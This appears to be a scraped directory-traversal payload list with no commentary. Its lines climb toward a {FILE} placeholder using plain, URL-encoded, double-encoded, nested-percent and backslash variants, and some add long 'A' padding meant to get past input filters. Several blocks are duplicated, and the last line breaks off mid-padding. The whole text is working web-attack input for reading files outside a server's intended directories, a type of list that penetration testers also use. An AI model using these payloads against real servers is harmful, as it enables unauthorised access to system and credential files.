%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA